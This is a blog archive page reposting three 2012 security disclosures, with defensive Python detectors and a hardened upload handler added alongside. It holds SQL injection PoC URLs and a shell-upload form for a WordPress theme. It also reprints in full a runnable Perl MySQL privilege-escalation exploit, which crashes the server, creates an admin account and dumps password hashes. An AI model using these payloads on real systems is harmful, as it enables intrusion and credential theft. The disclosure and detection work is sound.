Archive for 26 December 2012

Elite Bulletin Board 2.1.21 Multiple SQL Injection Vulnerabilities

An SQL injection vulnerability was found in Elite Bulletin Board version 2.1.21. Where the vulnerability occurs, how it is exploited, detailed information about it and the discoverer's own explanations are as follows:

Advisory ID: HTB23133
Product: Elite Bulletin Board
Vendor: elite-board.us
Vulnerable Version(s): 2.1.21 and probably prior
Tested Version: 2.1.21
Vendor Notification: November 28, 2012 
Vendor Patch: December 6, 2012 
Public Disclosure: December 19, 2012 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2012-5874
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Risk Level: High 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Elite Bulletin Board, which can be exploited to perform SQL injection attacks.


1) Multiple SQL injection vulnerabilities in Elite Bulletin Board: CVE-2012-5874

The vulnerabilities exist due to insufficient sanitization of user-supplied data in the URI in the "update_whosonline_reg()" and "update_whosonline_guest()" functions within the "/includes/user_function.php" script. 

A remote attacker can send a specially crafted HTTP request to one of the following scripts and execute arbitrary SQL commands in the application's database: 
- checkuser.php
- groups.php
- index.php
- login.php
- quicklogin.php
- register.php
- Search.php
- viewboard.php 
- viewtopic.php

Successful exploitation of the vulnerabilities may allow an attacker to extract sensitive data from the application's database, and even gain complete control over the application under certain conditions (such as insecure configuration of the database and web servers).

The following PoC (Proof of Concept) code demonstrates the vulnerabilities by displaying the version of the MySQL server:


http://[host]/checkuser.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/groups.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/index.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/login.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/quicklogin.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/register.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/viewboard.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2

http://[host]/viewtopic.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2&tid=1
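For a defender reading web server logs, the useful signal in the PoC URLs above is that the payload travels in the path segment after the .php script name (PATH_INFO), not in a query parameter, so a filter that inspects only query strings never sees it. The Python script below is added here as an example and is not part of the High-Tech Bridge advisory: it parses Apache combined-format access log lines, splits each request into script name, PATH_INFO and query string, URL-decodes both, and raises an alert only when two independent SQL indicators co-occur in the same location, so a lone apostrophe in a search term does not alert. The log lines, IP addresses and indicator names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines: two mirror the PATH_INFO injection
# shape from the advisory's PoC URLs, three are benign (one carries an apostrophe).
SAMPLE_LOG = """\
203.0.113.5 - - [19/Dec/2012:10:01:02 +0000] "GET /checkuser.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29%29%29%20--%20/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Dec/2012:10:01:03 +0000] "GET /viewtopic.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2&tid=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Dec/2012:10:02:10 +0000] "GET /viewtopic.php?bid=2&tid=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.8 - - [19/Dec/2012:10:02:11 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Dec/2012:10:03:00 +0000] "GET /search.php?q=o%27brien HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# client ip, timestamp, method, request target, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# script name, optional PATH_INFO after it, optional query string
SPLIT_RE = re.compile(r'^(/[^?]*?\.php)(/[^?]*)?(?:\?(.*))?$', re.IGNORECASE)

INDICATORS = {
    "quote_then_select": re.compile(r"'\s*,\s*\(*\s*select", re.I),  # the PoC's "',((select" shape
    "name_const": re.compile(r"name_const\s*\(", re.I),
    "select_from": re.compile(r"\bselect\b[^;]*?\bfrom\b", re.I),
    "sql_comment": re.compile(r"--\s"),
}


def decode_request_path(path):
    """Split a request target into (script, decoded PATH_INFO, decoded query); None if not a .php request."""
    m = SPLIT_RE.match(path)
    if not m:
        return None
    script, path_info, query = m.group(1), m.group(2) or "", m.group(3) or ""
    return script, unquote(path_info), unquote(query)


def classify_request(path):
    """Return a finding per location (path_info / query) that shows at least two SQL indicators."""
    parts = decode_request_path(path)
    if parts is None:
        return []
    script, path_info, query = parts
    findings = []
    for location, text in (("path_info", path_info), ("query", query)):
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        # Two independent indicators keep an apostrophe in a name from alerting on its own.
        if len(hits) >= 2:
            findings.append({"script": script, "location": location, "indicators": hits})
    return findings


def scan_log(text):
    """Run classify_request over every parsable log line and attach client and time."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        for finding in classify_request(path):
            alerts.append({"ip": ip, "time": ts, "status": int(status), **finding})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['time']} {a['ip']} {a['script']} via {a['location']}: {', '.join(a['indicators'])}")
```

Because the application stores the whole request URI in its who's-online tables, the same decoding step is what a web application firewall or log pipeline needs before pattern matching; matching on the raw percent-encoded path would miss trivially re-encoded variants.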


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to Elite Bulletin Board v2.1.22

More Information:
http://elite-board.us/Community/viewtopic.php?bid=1&tid=310
http://sourceforge.net/projects/elite-board/files/Elite%20Bulletin%20Board%20v2/2.1.22/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23133 - https://www.htbridge.com/advisory/HTB23133 - Multiple SQL Injection Vulnerabilities in Elite Bulletin Board.
[2] Elite Bulletin Board - http://elite-board.us/ - Elite Bulletin Board is an advanced Bulletin Board program that provides advanced features such as CAPTCHA, sub-board, skinning ability, multilingual, commercial password encryption, and much more.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

WordPress Clockstone and other CMSMasters Theme File Upload Vulnerabilities

A file upload vulnerability was found in the WordPress Clockstone theme and other CMSMasters themes.
Through this vulnerability malicious shells can be uploaded, and an uploaded shell can in turn provide access to other sites. Until the vulnerability is fixed, the “clockstone/theme/functions/upload.php” file should be temporarily removed and put back only after the fix has been applied.

# Exploit Title: [Clockstone and Various other CMSMasters Theme File Upload Vulnerabilities]
# Google Dork: ["wp-content/themes/clockstone"]
# Date: [12/18/2012]
# Exploit Author: [DigiP]
# Vendor Homepage: [http://cmsmasters.net/]
# Software Link: [http://themeforest.net/item/clockstone-ultimate-wordpress-theme/306607]
# Version: [1.2 and lower]

Clockstone WordPress Theme & Various CMSMasters Themes : File Upload Vulnerability Disclosure

A few weeks back I posted a warning on our site for users who used the Clockstone WordPress theme,
to remove it from their sites until CMSMasters had a chance to patch their theme(s). The flaw was a
file upload vulnerability that allowed anyone to access a victim's site by uploading whatever files they
wanted to the site. The nature of the flaw was not isolated to their Clockstone theme alone, so I worked
with CMSMasters to wait until they had a chance to patch this and their other themes as well. The code
that allowed this attack to happen was in several files which did not require user authentication from
logged-in WordPress users, and anyone visiting the URL directly would be able to execute the script
directly.

As promised, here is the POC of the attack code:
##############################################################
#	Shell upload attack:<br />
#	<form enctype="multipart/form-data" action="http://www.examplesite.com/wp-content/themes/clockstone/theme/functions/upload.php" method="post">
#	<input type="text" name="url" value="./" /><br />
#	Please choose a file: <input name="uploadfile" type="file" /><br />
#	<input type="submit" value="Upload" />
#	</form> 
##############################################################

After a successful attack, you would see on your screen the name of your uploaded file in hash form,
which would be located in the same path as the upload script if using the code above. You can choose
pretty much anywhere to upload the file to though. This file was an MD5 hashed name, ending in the
file extension of the file you uploaded, but the script echoed back the file name, so it was easy to see
where your file was when done.

The vulnerable code in their theme was as follows:
##############################################################
#	<?php
#
#	if ($_POST['url']){ $uploaddir = $_POST['url']; }
#
#	$first_filename = $_FILES['uploadfile']['name'];
#
#	$filename = md5($first_filename);
#
#	$ext = substr($first_filename, 1 + strrpos($first_filename, '.'));
#
#	$file = $uploaddir . basename($filename.'.'.$ext); 
#
#	if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)){
#		echo basename($filename.'.'.$ext);
#	} else {
#		echo 'error';
#	}
#
#	?>
##############################################################

We picked up this flaw because of our Attack Scanner plug-in, and seeing sites being attacked by others
running this theme. This led us to investigate their theme to see what was happening. This was (and is)
an exploit being used in the wild against sites running the Clockstone theme, but does not appear to be
widely known at this time. At least, we could not find a copy of the flaw being published publicly
anywhere, which means this was most likely only used by a select few who knew of this flaw. After
notifying CMSMasters of the issue, they've now updated their code base and done their best to contact
users of their themes. - DigiP http://www.attack-scanner.com/
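The handler DigiP quotes trusts three things taken straight from the request: the target directory (the `url` field), the file extension, and the absence of any login. The Python module below is an added example, not CMSMasters' or DigiP's code; it models the path decision of that handler next to a hardened version. `vulnerable_destination` reproduces the original path computation without writing anything, and `plan_upload` applies the checks a safe handler needs: caller-proven authentication, a fixed upload root instead of a client-chosen directory, an extension allowlist, a leading-bytes check against the claimed type, and a random stored name with exactly one extension. The function names, the allowlist and the magic-byte table are choices made for this example.

```python
import hashlib
import os
import secrets

# Constructed policy for this example: image uploads only, checked by extension AND leading bytes.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


class UploadRejected(Exception):
    """Raised by plan_upload with the reason an upload must not be stored."""


def vulnerable_destination(url, first_filename):
    """Mirror of the theme's path logic (nothing is written here): the directory comes
    straight from the request, the extension is copied verbatim from the client, and
    only the base name is hashed, so 'url' can point anywhere the server can write."""
    hashed = hashlib.md5(first_filename.encode()).hexdigest()
    ext = first_filename[first_filename.rfind(".") + 1:]
    return url + os.path.basename(hashed + "." + ext)


def plan_upload(original_name, content, upload_root, authenticated):
    """Return the destination path a hardened handler would use, or raise UploadRejected."""
    if not authenticated:
        raise UploadRejected("authentication required")
    # Strip any directory part the client sent (both separator styles).
    base = os.path.basename(original_name.replace("\\", "/"))
    if "." not in base:
        raise UploadRejected("file has no extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {ext!r} is not allowed")
    if not content.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match the claimed type")
    # Random stored name with exactly one extension: the client's name never reaches
    # the filesystem, so 'shell.php.jpg' cannot carry a second extension with it.
    stored = f"{secrets.token_hex(16)}.{ext}"
    root = os.path.realpath(upload_root)
    dest = os.path.realpath(os.path.join(root, stored))
    if os.path.dirname(dest) != root:  # defence in depth; the directory is ours, not the client's
        raise UploadRejected("destination escapes the upload root")
    return dest


def rejection_reason(original_name, content, upload_root, authenticated=True):
    """Convenience wrapper: None when the upload would be accepted, else the reason."""
    try:
        plan_upload(original_name, content, upload_root, authenticated)
    except UploadRejected as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    print("vulnerable:", vulnerable_destination("../../", "shell.php"))
    print("hardened  :", plan_upload("photo.JPG", b"\xff\xd8\xff\xe0" + b"\x00" * 16, "uploads", True))
    for name, data, auth in (("shell.php", b"<?php", True),
                             ("shell.php.jpg", b"<?php", True),
                             ("x.png", b"\x89PNG\r\n\x1a\n", False)):
        print(f"{name}: {rejection_reason(name, data, 'uploads', auth)}")
```

A leading-bytes check is not a parser: a valid image with script code appended still passes it, so the upload directory must additionally be served with script execution disabled (no PHP handler mapped there). The hardened handler also stops echoing a name the client can reuse, which is how the original script told the attacker where the file had landed.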

MySQL privilege elevation Exploit

How this vulnerability works:
* The attacker is in possession of a MySQL user with 'file' privileges on the target
* With this user the attacker can create files on the system (owned by the 'mysql' user)
* The attacker is therefore able to create TRIGGER files for a MySQL table
Triggers can be used to fire an event when a MySQL command is executed by the user; normally triggers are
'attached' to a user and run with that user's privileges. Because we can write any content into the TRG
file (the actual trigger file), we write the entry describing the user attached to the trigger as
"root@localhost", which is the default admin user.
* We make use of the previously discovered server stack overrun to flush the server configuration so the trigger file is recognized.
This step is really important: without crashing the MySQL server instance and reconnecting (the server will
respawn), the trigger file would not be recognized.
The Perl exploit for the vulnerability:

use DBI();

$|=1;

=for comment

MySQL privilege elevation Exploit
This exploit adds a new admin user.
By Kingcope

Tested on
* Debian Lenny (mysql-5.0.51a)
* OpenSuSE 11.4 (5.1.53-log)

How it works:
This exploit makes use of several things:
*The attacker is in possession of a mysql user with 'file' privileges for the target
*So the attacker can create files on the system with this user (owned by user 'mysql')
*So the attacker is able to create TRIGGER files for a mysql table
	triggers can be used to trigger an event when a mysql command is executed by the user,
	normally triggers are 'attached' to a user and will be executed with this users privilege.
	because we can write any contents into the TRG file (the actual trigger file), we write the entry
	describing the attached user for the trigger as "root@localhost" what is the default admin user.
* We make use of the stack overrun priorly discovered to flush the server config so the trigger file is recognized.
  This step is really important, without crashing the mysql server instance and reconnecting (the server will respawn)
  the trigger file would not be recognized.

So what the exploit does is:
* Connect to the MySQL Server
* Create a table named rootme for the trigger
* Create the trigger file in /var/lib/mysql//rootme.TRG
* Crash the MySQL Server to force it to respawn and recognize the trigger file (by triggering the stack overrun)
* INSERT a value into the table so the trigger event gets executed
* The trigger now sets all privileges of the current connecting user in the mysql.user table to enabled.
* Crash the MySQL Server again to force it reload the user configuration
* Create a new mysql user with all privileges set to enabled
* Crash again to reload configuration
* Connect by using the newly created user
* The new connection has ADMIN access now to all databases in mysql
* The user and password hashes in the mysql.user table are dumped for a convenient way to show the exploit succeeded
* As said the user has FULL ACCESS to the database now

Respawning of mysqld is done by mysqld_safe so this is not an issue in any configuration I've seen.
=cut

=for comment

user created for testing (file privs will minor privileges to only one database):

mysql> CREATE USER 'less'@'%' IDENTIFIED BY 'test';
Query OK, 0 rows affected (0.00 sec)

mysql> create database lessdb
    -> ;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON lessdb.* TO 'less'@'%' WITH GRANT OPTION;
Query OK, 0 rows affected (0.02 sec)

mysql> GRANT FILE ON *.* TO 'less'@'%' WITH GRANT OPTION;
Query OK, 0 rows affected (0.00 sec)

login with new unprivileged user:
mysql> select * from mysql.user;
ERROR 1142 (42000): SELECT command denied to user 'less2'@'localhost' for table 'user'

=cut

=for comment

example attack output:

C:\Users\kingcope\Desktop>perl mysql_privilege_elevation.pl
select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/lessdb3/rootme.TRG' LINES TER
MINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after ins
ert on rootme for each row\\nbegin \\nUPDATE mysql.user SET Select_priv=\\\'Y\\\
', Insert_priv=\\\'Y\\\', Update_priv=\\\'Y\\\', Delete_priv=\\\'Y\\\', Create_p
riv=\\\'Y\\\', Drop_priv=\\\'Y\\\', Reload_priv=\\\'Y\\\', Shutdown_priv=\\\'Y\\
\', Process_priv=\\\'Y\\\', File_priv=\\\'Y\\\', Grant_priv=\\\'Y\\\', Reference
s_priv=\\\'Y\\\', Index_priv=\\\'Y\\\', Alter_priv=\\\'Y\\\', Show_db_priv=\\\'Y
\\\', Super_priv=\\\'Y\\\', Create_tmp_table_priv=\\\'Y\\\', Lock_tables_priv=\\
\'Y\\\', Execute_priv=\\\'Y\\\', Repl_slave_priv=\\\'Y\\\', Repl_client_priv=\\\
'Y\\\', Create_view_priv=\\\'Y\\\', Show_view_priv=\\\'Y\\\', Create_routine_pri
v=\\\'Y\\\', Alter_routine_priv=\\\'Y\\\', Create_user_priv=\\\'Y\\\', ssl_type=
\\\'Y\\\', ssl_cipher=\\\'Y\\\', x509_issuer=\\\'Y\\\', x509_subject=\\\'Y\\\',
max_questions=\\\'Y\\\', max_updates=\\\'Y\\\', max_connections=\\\'Y\\\' WHERE
User=\\\'less3\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs
_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'lati
n1_swedish_ci\'\n';DBD::mysql::db do failed: Unknown table 'rootme' at mysql_pri
vilege_elevation.pl line 44.
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql_
privilege_elevation.pl line 50.
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql_
privilege_elevation.pl line 59.
W00TW00T!
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
Found a row: id = debian-sys-maint, name = *C5524C128621D8A050B6DD616B06862F9D64
B02C
Found a row: id = some1, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = monty, name = *BF06A06D69EC935E85659FCDED1F6A80426ABD3B
Found a row: id = less, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = r00ted, name = *EAD0219784E951FEE4B82C2670C9A06D35FD5697
Found a row: id = user, name = *14E65567ABDB5135D0CFD9A70B3032C179A49EE7
Found a row: id = less2, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = less3, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = rootedsql, name = *4149A2E66A41BD7C8F99D7F5DF6F3522B9D7D9BC

=cut

$user = "less10";
$password = "test";
$database = "lessdb10";
$target = "192.168.2.4";
$folder = "/var/lib/mysql/"; # Linux
$newuser = "rootedbox2";
$newuserpass = "rootedbox2";
$mysql_version = "51"; # can be 51 or 50

if ($mysql_version eq "50") {
$inject =
"select 'TYPE=TRIGGERS' into outfile'".$folder.$database."/rootme.TRG' LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost` trigger atk after insert on rootme for each row\\\\nbegin \\\\nUPDATE mysql.user SET Select_priv=\\\\\\'Y\\\\\\', Insert_priv=\\\\\\'Y\\\\\\', Update_priv=\\\\\\'Y\\\\\\', Delete_priv=\\\\\\'Y\\\\\\', Create_priv=\\\\\\'Y\\\\\\', Drop_priv=\\\\\\'Y\\\\\\', Reload_priv=\\\\\\'Y\\\\\\', Shutdown_priv=\\\\\\'Y\\\\\\', Process_priv=\\\\\\'Y\\\\\\', File_priv=\\\\\\'Y\\\\\\', Grant_priv=\\\\\\'Y\\\\\\', References_priv=\\\\\\'Y\\\\\\', Index_priv=\\\\\\'Y\\\\\\', Alter_priv=\\\\\\'Y\\\\\\', Show_db_priv=\\\\\\'Y\\\\\\', Super_priv=\\\\\\'Y\\\\\\', Create_tmp_table_priv=\\\\\\'Y\\\\\\', Lock_tables_priv=\\\\\\'Y\\\\\\', Execute_priv=\\\\\\'Y\\\\\\', Repl_slave_priv=\\\\\\'Y\\\\\\', Repl_client_priv=\\\\\\'Y\\\\\\', Create_view_priv=\\\\\\'Y\\\\\\', Show_view_priv=\\\\\\'Y\\\\\\', Create_routine_priv=\\\\\\'Y\\\\\\', Alter_routine_priv=\\\\\\'Y\\\\\\', Create_user_priv=\\\\\\'Y\\\\\\', ssl_type=\\\\\\'Y\\\\\\', ssl_cipher=\\\\\\'Y\\\\\\', x509_issuer=\\\\\\'Y\\\\\\', x509_subject=\\\\\\'Y\\\\\\', max_questions=\\\\\\'Y\\\\\\', max_updates=\\\\\\'Y\\\\\\', max_connections=\\\\\\'Y\\\\\\' WHERE User=\\\\\\'$user\\\\\\';\\\\nend\\'\\nsql_modes=0\\ndefiners=\\'root\@localhost\\'\\nclient_cs_names=\\'latin1\\'\\nconnection_cl_names=\\'latin1_swedish_ci\\'\\ndb_cl_names=\\'latin1_swedish_ci\\'\\n';";
} else {
$inject =
"select 'TYPE=TRIGGERS' into outfile'".$folder.$database."/rootme.TRG' LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost` trigger atk after insert on rootme for each row\\\\nbegin \\\\nUPDATE mysql.user SET Select_priv=\\\\\\'Y\\\\\\', Insert_priv=\\\\\\'Y\\\\\\', Update_priv=\\\\\\'Y\\\\\\', Delete_priv=\\\\\\'Y\\\\\\', Create_priv=\\\\\\'Y\\\\\\', Drop_priv=\\\\\\'Y\\\\\\', Reload_priv=\\\\\\'Y\\\\\\', Shutdown_priv=\\\\\\'Y\\\\\\', Process_priv=\\\\\\'Y\\\\\\', File_priv=\\\\\\'Y\\\\\\', Grant_priv=\\\\\\'Y\\\\\\', References_priv=\\\\\\'Y\\\\\\', Index_priv=\\\\\\'Y\\\\\\', Alter_priv=\\\\\\'Y\\\\\\', Show_db_priv=\\\\\\'Y\\\\\\', Super_priv=\\\\\\'Y\\\\\\', Create_tmp_table_priv=\\\\\\'Y\\\\\\', Lock_tables_priv=\\\\\\'Y\\\\\\', Execute_priv=\\\\\\'Y\\\\\\', Repl_slave_priv=\\\\\\'Y\\\\\\', Repl_client_priv=\\\\\\'Y\\\\\\', Create_view_priv=\\\\\\'Y\\\\\\', Show_view_priv=\\\\\\'Y\\\\\\', Create_routine_priv=\\\\\\'Y\\\\\\', Alter_routine_priv=\\\\\\'Y\\\\\\', Create_user_priv=\\\\\\'Y\\\\\\', Event_priv=\\\\\\'Y\\\\\\', Trigger_priv=\\\\\\'Y\\\\\\', ssl_type=\\\\\\'Y\\\\\\', ssl_cipher=\\\\\\'Y\\\\\\', x509_issuer=\\\\\\'Y\\\\\\', x509_subject=\\\\\\'Y\\\\\\', max_questions=\\\\\\'Y\\\\\\', max_updates=\\\\\\'Y\\\\\\', max_connections=\\\\\\'Y\\\\\\' WHERE User=\\\\\\'$user\\\\\\';\\\\nend\\'\\nsql_modes=0\\ndefiners=\\'root\@localhost\\'\\nclient_cs_names=\\'latin1\\'\\nconnection_cl_names=\\'latin1_swedish_ci\\'\\ndb_cl_names=\\'latin1_swedish_ci\\'\\n';";
}

print $inject;#exit;
$inject2 =
"SELECT 'TYPE=TRIGGERNAME\\ntrigger_table=rootme;' into outfile '".$folder.$database."/atk.TRN' FIELDS ESCAPED BY ''";

my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
                       "$user", "$password",
                       {'RaiseError' => 0});
eval { $dbh->do("DROP TABLE rootme") };
$dbh->do("CREATE TABLE rootme (rootme VARCHAR(256));");
$dbh->do($inject);
$dbh->do($inject2);

$a = "A" x 10000;
$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");

sleep(3);

my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
                       "$user", "$password",
                       {'RaiseError' => 0});

$dbh->do("INSERT INTO rootme VALUES('ROOTED');");
$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");

sleep(3);

my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
                       "$user", "$password",
                       {'RaiseError' => 0});

$dbh->do("CREATE USER '$newuser'\@'%' IDENTIFIED BY '$newuserpass';");
$dbh->do("GRANT ALL PRIVILEGES ON *.* TO '$newuser'\@'%' WITH GRANT OPTION;");
$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");

sleep(3);

my $dbh = DBI->connect("DBI:mysql:host=$target;",
                       $newuser, $newuserpass,
                       {'RaiseError' => 0});

my $sth = $dbh->prepare("SELECT * FROM mysql.user");
$sth->execute();

print "W00TW00T!\n";

while (my $ref = $sth->fetchrow_hashref()) {
print "Found a row: id = $ref->{'User'}, name = $ref->{'Password'}\n";
}
$sth->finish();
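The steps explained above leave a concrete artefact on disk: a .TRG file in a low-privilege database's directory whose definer is root@localhost, whose body rewrites mysql.user, and which the running server did not create (it only learned of it after being crashed and respawned). The Python scanner below is an added example and not part of Kingcope's exploit: it parses the key=value .TRG format visible in the exploit output (simplified here to one trigger per file), compares the trigger files found in the data directory with the set a DBA obtained from information_schema.TRIGGERS, and reports files that touch the privilege tables, carry a superuser definer, or are unknown to the server. The data directory layout, the two trigger files and the known-trigger set are constructed for this example.

```python
import os
import re
import tempfile

# Constructed .TRG contents. The first has the shape written by the exploit; the second is
# an ordinary audit trigger. Backslash escapes are literal in the file, as in real .TRG files.
ROGUE_TRG = (
    "TYPE=TRIGGERS\n"
    "triggers='CREATE DEFINER=`root`@`localhost` trigger atk after insert on rootme for each row"
    "\\nbegin \\nUPDATE mysql.user SET Super_priv=\\'Y\\' WHERE User=\\'less\\';\\nend'\n"
    "sql_modes=0\n"
    "definers='root@localhost'\n"
    "client_cs_names='latin1'\n"
    "connection_cl_names='latin1_swedish_ci'\n"
    "db_cl_names='latin1_swedish_ci'\n"
)
BENIGN_TRG = (
    "TYPE=TRIGGERS\n"
    "triggers='CREATE DEFINER=`app`@`localhost` trigger orders_audit after insert on orders for each row"
    "\\nbegin \\nINSERT INTO orders_log VALUES (NEW.id, NOW());\\nend'\n"
    "sql_modes=0\n"
    "definers='app@localhost'\n"
)
# Constructed: what `SELECT TRIGGER_SCHEMA, TRIGGER_NAME FROM information_schema.TRIGGERS` reported.
KNOWN_TRIGGERS = {("shop", "orders_audit")}

PRIVILEGE_TABLES = re.compile(
    r"\bmysql\s*\.\s*(user|db|tables_priv|columns_priv|procs_priv|proxies_priv)\b", re.I)
SUPERUSERS = {"root"}  # definer accounts that should never appear in an application schema


def unescape(value):
    """Undo the \\n, \\' and \\\\ escapes used inside quoted .TRG values."""
    out, i = [], 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            out.append({"n": "\n", "'": "'", "\\": "\\"}.get(value[i + 1], "\\" + value[i + 1]))
            i += 2
        else:
            out.append(value[i])
            i += 1
    return "".join(out)


def parse_trg(text):
    """Parse key=value lines; quoted values are unescaped (simplified: one value per key)."""
    fields = {}
    for line in text.splitlines():
        if "=" not in line:
            continue
        key, _, raw = line.partition("=")
        raw = raw.strip()
        if len(raw) >= 2 and raw[0] == raw[-1] == "'":
            raw = unescape(raw[1:-1])
        fields[key.strip()] = raw
    return fields


def trigger_name(body):
    m = re.search(r"\btrigger\s+`?(\w+)`?", body, re.I)
    return m.group(1) if m else None


def assess_trigger(schema, fields, known_triggers):
    """Return (trigger name, list of reasons the file deserves a look)."""
    body, definer = fields.get("triggers", ""), fields.get("definers", "")
    name, reasons = trigger_name(body), []
    if PRIVILEGE_TABLES.search(body):
        reasons.append("body touches MySQL privilege tables")
    if definer.split("@", 1)[0] in SUPERUSERS:
        reasons.append(f"definer {definer} is a superuser account")
    if name and (schema, name) not in known_triggers:
        reasons.append("trigger file on disk but not registered in information_schema.TRIGGERS")
    return name, reasons


def scan_datadir(datadir, known_triggers):
    """Walk <datadir>/<schema>/<table>.TRG and collect findings."""
    findings = []
    for schema in sorted(os.listdir(datadir)):
        sdir = os.path.join(datadir, schema)
        if not os.path.isdir(sdir):
            continue
        for fn in sorted(os.listdir(sdir)):
            if not fn.endswith(".TRG"):
                continue
            with open(os.path.join(sdir, fn), encoding="latin-1") as fh:
                fields = parse_trg(fh.read())
            name, reasons = assess_trigger(schema, fields, known_triggers)
            if reasons:
                findings.append({"schema": schema, "table": fn[:-4], "trigger": name,
                                 "definer": fields.get("definers"), "reasons": reasons})
    return findings


def build_sample_datadir():
    """Create a throwaway data directory holding the two constructed trigger files."""
    datadir = tempfile.mkdtemp(prefix="mysql-datadir-")
    for schema, table, content in (("lessdb", "rootme", ROGUE_TRG), ("shop", "orders", BENIGN_TRG)):
        os.makedirs(os.path.join(datadir, schema))
        with open(os.path.join(datadir, schema, table + ".TRG"), "w", encoding="latin-1") as fh:
            fh.write(content)
    return datadir


if __name__ == "__main__":
    for f in scan_datadir(build_sample_datadir(), KNOWN_TRIGGERS):
        print(f"{f['schema']}.{f['table']} trigger {f['trigger']} (definer {f['definer']}):")
        for r in f["reasons"]:
            print("  -", r)
```

Pair the scan with alerting on unexpected mysqld restarts: the procedure above needs the server to die and be respawned by mysqld_safe three times, and each restart is recorded in the error log. Removing FILE privilege from application accounts (or setting secure_file_priv) takes away the step that writes the trigger file in the first place.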